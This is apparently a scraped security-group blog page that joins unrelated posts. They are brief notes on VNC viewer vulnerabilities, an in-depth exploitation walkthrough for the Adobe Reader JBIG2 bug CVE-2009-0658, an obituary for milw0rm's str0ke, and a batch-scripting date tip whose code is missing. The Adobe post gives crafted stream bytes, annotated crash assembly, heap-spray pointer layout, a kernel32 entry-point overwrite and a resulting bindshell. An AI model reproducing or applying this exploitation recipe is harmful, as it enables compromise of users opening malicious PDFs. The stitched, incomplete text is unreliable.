Well, a few things to report here in the blackbl0gs. Firstly, I've spent the past few days looking into/writing exploits for these recent VNC viewer vulns in the RFB protocol. The first vulnerability affects Real VNC viewer <=4.1.2 (CVE-2008-4770). This vulnerability is triggered when incorrect information is passed to CMsgReader::readRect(), which can lead to an integer underflow in the allocation size. The remaining data in the packet following the allocation size is then copied into the buffer allocated on the stack, leading to an SEH overwrite. The second vulnerability, which we're currently looking into accurately exploiting, is a vulnerability in TightVNC <=1.3.9 (CVE-2009-0388). In this vulnerability malicious data can be passed to a Tvnc subfunction in which a null byte overwrite can be triggered via an integer over/underflow @ HeapPointer + ControllableValue. Lotsa fun other hacks going on in the priv8 arena.

ttfn, -xort

Adobe Acrobat/Reader Universal Exploit : APSB09-01 (aka CVE-2009-0658)

Hey gang,
It's been a few days since our last post, but not to worry! Still lots of fun stuff happening in the blacksec community. Our latest post is a brief analysis of the JBIG2 vulnerability recently patched by Adobe in APSB09-01 (aka CVE-2009-0658). What I thought was particularly interesting (although not surprising, given vendors' actual understanding of the vulnerabilities that typically affect their software) was its classification: "Buffer overflow issue in versions 9.0 and earlier of Adobe Reader and Acrobat". The actual bug stems from a pointer-indexing issue when utilizing a specifically crafted JBIG2 structure.

Bugs like this are fun, because they can often lead to multiple different avenues that in turn can be leveraged for execution. We were able to gain control of execution through the use of some careful heap spraying that would create one half of a sprayed area of pointers that are later loaded and used in a controlled write operation, followed by another half of your typical nopsled/shellcode heap spraying. Combine this spraying with the time used to allocate the memory being used and you could easily overwrite low-addressed (static) module entry points. There's a little more to this, so let's dig in...

Let's begin with the original crash mentioned in the Snort VRT blog posting (http://vrt-sourcefire.blogspot.com/2009/02/have-nice-weekend-pdf-love.html). From the posting:

"the 5th byte into the stream (which is the segment header flag byte) were to have the 6th bit set indicating a large page association size:

00 00 00 01 40 00 00 33 33 33"

Here, we can see the beginning of our long road to exploitation. After modifying the segment header flag of our JBIG2 stream, we are able to embed a controllable (big endian!) pointer beginning at the 2nd byte following the segment header flag. Using the values described in the original advisory, we can trigger a crash at the first location (0387298A, the ADD operation) as seen below.

03872979 |. 8B41 1C MOV EAX,DWORD PTR DS:[ECX+1C]
; our (big endian) pointer gets loaded into EAX
0387297C |. 85C0 TEST EAX,EAX
0387297E |. 0F84 AC020000 JE Acroba_1.03872C30
03872984 |. 8B4E 10 MOV ECX,DWORD PTR DS:[ESI+10]
; The base-index register gets loaded into ECX
03872987 |. 8D0480 LEA EAX,DWORD PTR DS:[EAX+EAX*4]
; EAX gets multiplied by 5
0387298A |. 834481 EC 01 ADD DWORD PTR DS:[ECX+EAX*4-14],1
; ECX+ EAX*4 - the value at this location gets incremented.

Here ECX varies in its exact location but generally lands in the ~02xxxxxx range. If we craft some generic heap spraying code, we can allocate blocks of memory within a specified distance of this pointer. So, after adding the heap spraying code we can see a nice area of memory that gets allocated at 0x082xxxxx-0x0fexxxxx (or 0x6200000 to 0xDE00000 bytes away). This area is located after CoolType and before acaptuse in memory. If we look back at the assembly from the first crash area, we can see our pointer gets multiplied by 5 first and then multiplied by 4 again in the following operation (you'll see below that this same logic is repeated in the second crash). Applying this logic, if we use a value such as 0x00666666, it will first be multiplied by 5 to give us 0x01FFFFFE and then multiplied by 4 again to finally equal 0x07FFFFF8. This drops us right in the middle of our first large heap-sprayed area and allows us to continue on to the second crash location.

03872BC7 |> 8B0CBB /MOV ECX,DWORD PTR DS:[EBX+EDI*4]
03872BCA |. 8B41 1C |MOV EAX,DWORD PTR DS:[ECX+1C]
; our (big endian) pointer gets loaded into EAX
03872BCD |. 8B56 10 |MOV EDX,DWORD PTR DS:[ESI+10]
; EDX points to the same base we used before in ECX
03872BD0 |. 8D0480 |LEA EAX,DWORD PTR DS:[EAX+EAX*4]
; EAX gets multiplied by 5
03872BD3 |. 8D4482 EC |LEA EAX,DWORD PTR DS:[EDX+EAX*4-14]
; the address of where we performed our last ADD at the first crash location gets
; loaded into EAX
03872BD7 |. 8B50 04 |MOV EDX,DWORD PTR DS:[EAX+4]
; HEAPSPRAY_AREA+0x4 gets loaded into EDX
03872BDA |. 85D2 |TEST EDX,EDX
; make sure this isn't 0!
03872BDC |. 74 0A |JE SHORT Acroba_1.03872BE8
03872BDE |. 8B68 10 |MOV EBP,DWORD PTR DS:[EAX+10]
; HEAPSPRAY_AREA+0x10 gets loaded into EBX
03872BE1 |. 890CAA |MOV DWORD PTR DS:[EDX+EBP*4],ECX
; a pointer to our struct gets written to anywhere we want

Here, we crash at the second location with the values EDX and EBX equaling 0x90909090. Basically, we can overwrite any portion of (writable) memory with a pointer to our struct. We accomplish this by making the first 100-300 of our heap spray operations (of typically 1000) with [x][y][x][y][x][y][x][y] style alternating pointers where x is the value we want to overwrite and y is 0 (used in EBX*4). Other values can be used here but you get the general idea.

Let's focus now on what's at the pointer we're able to write anywhere in memory.

This is our stream from our file:

stream.....@.........,...H...........
73 74 72 65 61 6D 0A [00000001] 40 00 00666666 [13000007] 2C 00 00 09

Certain bytes have been separated and put into brackets to help visualize their exact locations when loaded into memory.

When the second crash occurs ECX points to the following memory data:

010B60F0 [01 00 00 00]00 62 01 00 00 00 2F 44 00 00 75 6D  .....b..../D..um
010B6100 00 00 00 00 25 32 30 61 6E 64 25 32 F4 FF FF FF  ....%20and%2ôÿÿÿ
010B6110 [07 00 00 13]00 00 72 75 62 D0 A2 01 0C 6B BA 00  ......rubÐ¢..kº.


As you can see, we control the 2 (little endian) pointers at [ECX] and [ECX+0x20] and can place whatever values we wish at these locations by manipulating the stream in our malformed pdf. Our solution was to simply place a "CALL [ECX+0x20]" at the first location where we land (after overwriting a called pointer) and to stick wherever we want to land at [ECX+0x20] (or right after our index pointer in our jbig2 stream).

So, what to overwrite? We spent a day or two looking for static areas of memory that were to be accessed after the crash that would lead to execution. In the end, we decided to take advantage of the Module Entry point of kernel32 located in the 0x00251xxx range. These locations will vary based on SP/pdf you have created but after a little math can be statically calculated.

00251FD8 7C800000 kernel32.7C800000
00251FDC 7C80B63E kernel32. ; <- what we clobber!
00251FE0 000F6000
00251FE4 00420040 Acrobat.00420040
00251FE8 00251F70 UNICODE "C:\WINDOWS\system32\kernel32.dll"
00251FEC 001A0018
00251FF0 00251F98 UNICODE "kernel32.dll"
00251FF4 80084004

This is called not too long after our heap spraying has completed and our overwrite has succeeded. This leaves only one last step: to toss your fav high mem address into ECX+0x20. We chose to use something simple, 0x13131313, which lands in the second portion of our heap spraying code. This technique works on both Acrobat and Reader 9 with the same offsets :D:D:D. One, two, twenty-three, four...adobe bindshell landing at your door.

C:\Documents and Settings\Administrator\Desktop> telnet localhost 5500

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Administrator\Desktop>


Bindshell Exploit

- xort & redsand

Str0ke @ Milworm's Funeral is This Friday

Many of us have wondered where str0ke has been and why milw0rm has not been updated in a good while. I recently was informed that str0ke has been hospitalized due to a strange condition with his heart, which he has had since he was a child.

Sadly....

I've just received information that str0ke @ milw0rm has passed away due to cardiac arrest early this morning at 9:23 AM. We @ blacksecurity are deeply saddened by the loss of a good hearted friend.

We wish nothing but blessing to his wife and 4 children.

RIP str0ke 1974-04-29 - 2009-11-03 09:23

:o(

rip str0ke

Extract %date% in Batch Programming

Hi Friends,

One very annoying problem is extracting date & time using batch programming.
The reason is simple!
Try c:\>echo %date% on Windows 2003 Server v/s Windows 2000 Server
Windows 2000 Server Output: Sun 06/13/2010
Windows 2003 Server Output: 06/13/2010

You will see that the two outputs are different, and that is the cause of a big headache. When I write administrative scripts for taking log backups with the appropriate date, it is very important for me that such platform differences do not make my batch scripts fail on either platform.

Thus, this led me to find a generic solution which will always extract the correct date for me, no matter whether Windows 2000 Server or Windows 2003 Server is the underlying platform!

My earlier way to extract date was like this:
@set date_temp=%date:~4,2%%date:~7,2%%date:~10,4%
This used to give me output as

Windows 2000 Server Output: 06132010
Windows 2003 Server Output: 3/01

As you can clearly see, my approach fails on the Windows 2003 Server platform. I have the option to modify & set up my date extraction as per the Windows 2003 Server platform, but that would make it fail on Windows 2000 Server :-(
So how to find that all in one code?

Well, it's simple! Just have a glance at the below code:


The above code will always return the correct date regardless of the underlying platform. It works correctly because its logic is based on the delimiter "-"
I was relieved that at least the delimiter is common across all the Windows versions :-)

I hope this helps you in your batch or DOS programming :-D
If you have similar issues for extracting %time%, checkout how to extract %time%!
